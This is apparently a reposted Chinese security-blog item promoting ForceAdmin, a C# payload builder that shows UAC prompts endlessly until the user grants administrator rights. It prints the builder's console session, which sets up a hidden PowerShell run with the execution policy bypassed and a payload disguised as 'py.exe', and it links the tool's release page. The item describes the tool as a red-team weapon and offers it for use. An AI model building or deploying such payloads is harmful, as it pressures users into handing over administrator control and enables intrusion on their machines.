ForceAdmin 是 ac# 有效负载构建器,创建无限的 UAC 弹出窗口,直到用户允许程序运行。输入的命令通过调用 cmd.exe 的 powershell 运行,并且应该使用批处理语法。这种攻击将迫使他们以管理员身份运行。
[ ] Enter the output file name > py.exe
[ ] Enter the window command to be executed > whoami /priv && pause
[powershell command? (Y/N) > y ] Would you like to configure the ForceAdmin
[for the arguments to be loaded into the input dialouge ] Please wait
[ ] Edit the powershell arguments > -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
[ ] Generating payload...
[ ] Payload generated!
点否则一直循环UAC、直到点是授权
项目地址
https://github.com/catzsec/ForceAdmin/releases/tag/v1.2.0
原文始发于微信公众号(Khan安全攻防实验室):红队利器 - 创建无限 UAC 提示,强制用户以管理员身份运行
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论